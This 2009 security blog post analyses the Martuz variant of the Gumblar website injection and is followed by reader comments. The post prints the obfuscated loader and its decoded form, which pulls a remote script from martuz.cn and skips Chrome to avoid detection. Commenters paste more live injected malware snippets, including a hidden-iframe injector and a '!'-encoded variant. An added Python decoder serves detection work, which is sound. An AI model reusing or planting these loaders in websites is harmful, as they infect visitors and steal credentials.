
Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?

   18 May 09   Filed in General, Website exploits

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolves. The site cannot be accessed, so the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58).

The script

(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

The script looks and acts the same as the gumblar script. All facts we know about the Gumblar apply to Martuz as well. And the removal instructions should be the same.

What’s new?

This is the decoded version of the script

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}

As you can see, this code injects an external script that loads content from “martuz.cn”.

The Martuz version of the script is slightly more sophisticated.

Hackers made it more difficult to identify the script even when you decode it. They now split the domain name and have the script concatenate the parts: “martu”+”z.cn”, “mart”+”uz.cn”, etc. Simple scripts that search for “martuz.cn” may not detect the script.

Martuz vs Google Chrome

In Gumblar, hackers only wanted to load the script on Windows machines running versions of Windows prior to Vista (NT 6). In Martuz, they added a new check and no longer load the external script in the Google Chrome browser. I guess hackers read multiple forums and noticed that many webmasters used Google Chrome to detect the malicious code (Chrome detects calls to blacklisted sites and warns users). Now, if a webmaster loads an infected web site in Chrome, there will be no warning since the external code won’t load. And the webmaster may mistakenly think that the site is clean and no additional removal action is required.

Don’t count on Google Chrome (and Safari) warnings. As you can see, hackers can make their code unnoticeable. And they can use new domain names every day, so even if Chrome detects calls to the new malicious sites, it won’t warn you since those sites are not blacklisted yet.

Make sure to check the source code of web pages. Or check web pages with my Unmask Parasites – it detects suspicious scripts without executing them.
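The decoding trick the script relies on (swap a marker character for “%”, then unescape and eval) and the split-domain trick (“martu”+“z.cn”) can both be undone statically, without running any JavaScript. The following Python is an added example written for this post; it is not the Unmask Parasites code. It builds its own constructed sample from a placeholder host (example.invalid, never the real domain), so the encoder, the sample script and the marker characters “-” and “!” are all assumptions made for the demo, not material taken from a live infection.

```python
"""Static decoder for the Gumblar/Martuz-style '%'-substitution loader.

The loader keeps its real body URL-encoded, with '%' swapped for a marker
character, restores '%' with .replace() and runs unescape() + eval().
We reverse that ourselves, then merge adjacent string literals so a domain
split as "martu"+"z.cn" becomes searchable again.  Nothing here executes JS.
"""
import re
from urllib.parse import unquote

# Constructed stand-in for a decoded loader.  The host is a placeholder.
DECODED = ('var u=navigator.userAgent;if(u.indexOf("Chrome")<0){'
           'document.write("<script src=//examp"+"le.invalid/vid/?id=1><\\/script>");}')


def obfuscate(js: str, marker: str) -> str:
    """Constructed encoder mirroring what the loader undoes: URL-encode most
    characters, leave some letters readable, and write `marker` instead of '%'."""
    out = []
    for i, ch in enumerate(js):
        if ch.isalnum() and i % 3:          # keep a few letters readable, as the real sample does
            out.append(ch)
        else:
            out.append(f"{marker}{ord(ch):02x}")
    return "".join(out)


def build_sample(marker: str) -> str:
    """Wrap the encoded payload in a loader stub shaped like the one in the post."""
    payload = obfuscate(DECODED, marker)
    return (f"(function(){{var G='%';var K='{payload}';"
            f"var m=K.replace(/{marker}/g,G);eval(unescape(m))}})();")


_LITERAL_RE = re.compile(r"'([^']{40,})'|\"([^\"]{40,})\"")      # long string literals
_MARKER_CANDIDATE_RE = re.compile(r"([^0-9A-Za-z\s])(?=[0-9A-Fa-f]{2})")
_CONCAT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')


def extract_payloads(js: str) -> list:
    """Return every long quoted string in the script; the payload is one of them."""
    return [single or double for single, double in _LITERAL_RE.findall(js)]


def guess_marker(payload: str):
    """The marker is the punctuation character most often followed by two hex digits."""
    counts = {}
    for m in _MARKER_CANDIDATE_RE.finditer(payload):
        counts[m.group(1)] = counts.get(m.group(1), 0) + 1
    return max(counts, key=counts.get) if counts else None


def decode_payload(payload: str) -> str:
    """Undo marker -> '%' and percent-decode, exactly what the loader does before eval."""
    marker = guess_marker(payload)
    if marker is None:
        return payload
    return unquote(payload.replace(marker, "%"))


def join_string_literals(js: str) -> str:
    """Merge "a"+"b" into "ab" repeatedly so split domain names become whole."""
    previous = None
    while previous != js:
        previous, js = js, _CONCAT_RE.sub(r'"\g<1>\g<2>"', js)
    return js


def analyse(js: str) -> list:
    """Decode every candidate payload and report the indicators the post describes."""
    findings = []
    for payload in extract_payloads(js):
        decoded = join_string_literals(decode_payload(payload))
        if re.search(r'document\.write\(\s*"<script\s+src=', decoded):
            findings.append("writes an external <script> tag")
        for host in re.findall(r"src=//([A-Za-z0-9.-]+)", decoded):
            findings.append(f"remote script host: {host}")
        if 'indexOf("Chrome")<0' in decoded:
            findings.append("skips Google Chrome")
    return findings


if __name__ == "__main__":
    for marker in ("-", "!"):
        sample = build_sample(marker)
        print(f"marker {marker!r}: host literally in source? {'example.invalid' in sample}")
        for finding in analyse(sample):
            print("  ", finding)
```

The host name never appears literally in the obfuscated source, which is why a plain search for a domain misses these injections; decoding and then joining the concatenated literals is what makes the search reliable, and guessing the marker by frequency means the same code handles variants that use a different character (several readers reported a “!” variant).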

What’s next?

Now that we all know how fast Gumblaroids (Gumblar-type exploits) can spread and how difficult it is to remove them from web sites and local computers, the Martuz incarnation should be shut down very soon. But I don’t think hackers will give up. We should be ready for new malicious domains and more and more sophisticated scripts.

And don’t forget hackers still have a big database of compromised FTP credentials and a lot of sites with hidden backdoor scripts that they can still use. And I’m sure they’ll use them.

Let’s discuss the issue.

If you have any additional information about the Martuz incarnation of the exploit or want to share your thoughts about Gumblaroids, please leave your comments below.

Reader's Comments (40)

  1. |

    [...] Here is some coverage about it: http://blog.scansafe.com/ http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/ [...]

  2. |

    Great Information on this recent set of attacks.
    I have been watching this issue progress over the last couple of weeks. I have worked with unmaskparasites.com on a couple of new trends. Keep it up.

  3. |

    [...] Well, nobody else has published an article on it, so it can’t be helped. Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? Unmask Parasite has published an article on it. [...]

  4. |

    It seems that my computer was infected with a form of this virus. Below is the Javascript that was put on a website I manage.

    var XaylbySQXemLUQDTDUHF = “A60A105A102A114A97A109A101A32A119A105A100A116A104A61A34A52A56A48A34A32A104A101A105A103A104A116A61A34A54A48A34A32A115A114A99A61A34A104A116A116A112A58A47A47A116A114A97A102A102A105A99A115A45A105A110A115A112A101A99A116A111A114A46A99A110A47A100A97A105A108A121A95A115A116A97A116A115A47A105A110A46A99A103A105A63A51A34A32A115A116A121A108A101A61A34A98A111A114A100A101A114A58A48A112A120A59A32A112A111A115A105A116A105A111A110A58A114A101A108A97A116A105A118A101A59A32A116A111A112A58A48A112A120A59A32A108A101A102A116A58A45A53A48A48A112A120A59A32A111A112A97A99A105A116A121A58A48A59A32A102A105A108A116A101A114A58A112A114A111A103A105A100A58A68A88A73A109A97A103A101A84A114A97A110A115A102A111A114A109A46A77A105A99A114A111A115A111A102A116A46A65A108A112A104A97A40A111A112A97A99A105A116A121A61A48A41A59A32A45A109A111A122A45A111A112A97A99A105A116A121A58A48A34A62A60A47A105A102A114A97A109A101A62″;var muvKZESuOYzlyxXawpqT = XaylbySQXemLUQDTDUHF.split(“A”);var TcentiGxCODoIzyiDQcR = “”;for (var pcDoaaOWPFqjiVWcDdaF=1; pcDoaaOWPFqjiVWcDdaF

    • |

      Hi Brett,

      It’s not a Gumblaroid.

      I’ve seen a similar script the other day (just with another target domain). It injects a hidden iframe that tries to silently load malicious PDF/Flash files onto visitors’ computers.

      If I see more of these exploits, I’ll review them too.

  5. |

    In the same situation. Found gumblar last week, everything on the server was deleted, reuploaded, ftp passwords were changed and computer scanned with spybot, avg 8.5, and malwarebytes.

    Server was clean for two days. here we are today with martuz .cn

    Edit by Denis: I removed your site from your signature since it is still infected. Unfortunately, you are right. It’s martuz.
    http://www.UnmaskParasites.com/security-report/?page=jimidemetriou.com

  6. |

    There is no existence of any parts of the script in my web pages, and my site is going slow because martuz .cn is loading slow.

    Wonder why… it’s php. Check this out! http://pastebin.com/m3adeab39 that is the code that is injected into php files now.

    • |

      Just wanted to update this, I downloaded all my files, did a search and replace of all that script, then re-uploaded to my server, it’s gone now.

      • |

        Make sure you’ve removed backdoor script too (they usually put them into /images directories as image.php, but the actual filenames may be different on your server). And changed the file/directory permissions back to normal.

  7. |

    Is there a way to check ftp logs with the server and deny ftp access to these uploaders?

    • |

      Jimi, Some hosters provide the possibility to deactivate FTP and SSH by Webfrontend for administration.

  8. |

    [...] [...]

  9. |

    What’s the best way to clean these???? I am using the ‘Find All’ and ‘Replace All’ in Macromedia. Is that the best way or is there a smarter way?

  10. |

    Macromedia Dreamweaver I meant….

  11. |

    [...] You may or may not know, but TweetPhoto was attacked 3 times in the last 24 hours. Every time the site has been attacked we’ve quickly responded by removing the virus. It’s been a battle between us and the transforming Gumblar virus which is now morphed to what is known as the Martuz virus. [...]

    Edit by Denis: http://www.UnmaskParasites.com/security-report/?page=tweetphoto.com/blog/2009/05/19/tweetphoto-under-attack-site-restored-back-to-health/

  12. |

    By the way – check your error docs. Every one of the custom error docs will probably have the code.

  13. |

    [...] & Answers ( May 14, 2009 )- Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks ( May 14, 2009 )- Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? ( May 18, 2009 ) Press articles:- New Wave of "Gumblar" Hacked Sites Installs [...]

  14. |

    Does anyone have a solution for this problem, if a website is ‘infected’ how can they fix it?

  15. |

    [...] on my site. What’s more, this week it (read: gumblar.cn) has got another friend called martuz, which has moved in as well. And there really is no difference from the previous one. Like someone who wants to [...]

  16. |

    Also look for a doc called sh1.php in the images folder

  17. |

    I’ve done a large analysis of the attack that you can read about here

    The goals of the attack currently are to:

    Steal FTP credentials
    Send spam
    Install fake antivirus
    Hijack Google search queries
    Disable security software

  18. |

    [...] Unmask Parasites http://blog.unmaskp…-of-gumblar-exploit/ [...]

  19. |

    I’m having some problems on one of my sites, it was loading something from martuz, some HTML.IFRAME-32 hidden iframe, I have cleaned it and don’t know from where I picked it up, because I have some IFRAMES from other sites with some info. Nasty things…

  20. |

    [...] info here, here, here and [...]

  21. |

    I have been battling this virus for a few days now and finally thought I had gotten rid of it on the sites I manage. Then while browsing through one of the pages I notice in bottom left “waiting for martuz.cn”.

    Now my question is, how can I tell if the virus is on my local machine if all the usual signs did not happen? (google hijack, trojan, fake virus scanner install..etc).

    The reason I ask is cause I don’t want to FTP back into my sites and have them become fully infected again, if my computer is infected again. Need to know if I have to reformat again.

    Thanks,
    Jason

  22. |

    I’m working on removal from several websites I administer. Google reports instances of both martuz.cn and gumblar.cn.

    I did an initial overwrite of files last week, and found martuz still present. I’ve now searched through the pages of a smaller site line by line, and found a few more instances. Still showed “martuz.cn” as loading in the status bar when I pulled the page up.

    Preparing to look into the Apache server files (such as .htaccess) as well as look at the solution posted here.

    Thanks for your thorough reporting…

  23. |

    [...] last 5 years.  My genius web-designer friend helped me kill the thing (you can read more about it here), but the Google warning [...]

  24. |

    I had gumblar a few weeks ago, which I thought I killed; today I got hit with Martuz.

    I can’t get it though and need some help. I changed FTP passwords, downloaded files, found the bad code that starts with “function only in my javascript files, found gifimage.php in my images directory which was deleted.

    Every time I upload a clean javascript file it gets instantly infected?

    What am I doing wrong, please help and thanks

  25. |

    My genius web-designer friend helped me kill the thing

  26. |

    My website is infected too… and it’s making my life tough… hope I will find a cure soon…

    Edit by Denis: Site link has been removed from your signature since the site was still blacklisted by Google.
    http://www.UnmaskParasites.com/security-report/?page=manojky.net
    Consider requesting a malware review via Google’s Webmaster Tools

  27. |

    [...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]

  28. |

    We have developed a small application that deals with this kind of virus.

    Please check it out here:
    http://www.axxis.gr/index.php?option=com_content&view=article&id=35

  29. |

    I have the following variant in my source code:

    (function(VXz3Z){var BbU=’%';var FxUO=’v!61r!20a!3d!22Sc!72ip!74Eng!69ne!22!2c!62!3d!22V!65rsion()!2b!22!2cj!3d!22!22!2cu!3dn!61!76igat!6fr!2euserAgent!3bif(!28!75!2eindexOf(!22Chrom!65!22)!3c0)!26!26(u!2e!69nd!65xOf(!22!57in!22!29!3e0)!26!26(u!2ein!64exO!66!28!22N!54!206!22)!3c!30!29!26!26(d!6f!63!75ment!2eco!6fkie!2eindexOf(!22mi!65k!3d1!22)!3c0)!26!26(typeo!66(!7ar!76zts)!21!3dt!79!70e!6ff(!22A!22)))!7bzrvzts!3d!22A!22!3b!65va!6c(!22i!66(wi!6e!64!6fw!2e!22+a!2b!22)j!3d!6a+!22+a+!22Major!22+b+a+!22Minor!22+!62+!61!2b!22!42u!69l!64!22+b+!22j!3b!22!29!3bdocume!6et!2ewrite(!22!3csc!72i!70t!20!73r!63!3d!2f!2fmar!74u!22+!22z!2e!63n!2fv!69d!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d’;eval(unescape(FxUO.replace(VXz3Z,BbU)))})(/\!/g);

  31. |

    The remaining question: why do they exploit?

    What’s their reason to inject iframes and backdoors?

    Does anyone know what they’re after?

  32. |

    My website boilpass .com has been attacked too. So boring things!

  33. |

    I pulled this off my site. Does anyone know what it is?
    Every index page or folder on my client’s site with an index file had a variant of that code on it.

    I would like to find a way of scanning every file on my server for that code if anyone knows a way, please share.

    This is the bugger code!

    c10z4=”;y607d50a7=/* ybe2941746 */document;y607d50a7.write(‘function ya7e355862b(ybb011505854){return ev’+c10z4+’al(ybb011505854); }’); function c101e3f8acy4aaf1(yb4f4fa702){ var zb3=”;return (ya7e355862b(‘par’+zb3+’seInt’)(yb4f4fa702,16));}function yddd1a98894e(y46cc6e076){ function y793dae(){var y43d1297eada=2;return y43d1297eada;} var y40fa2c6=”;yab485=’fromCh’;ya7ca8b5ecee=String[yab485+'arCode'];for(yda0de91=0;yda0de91
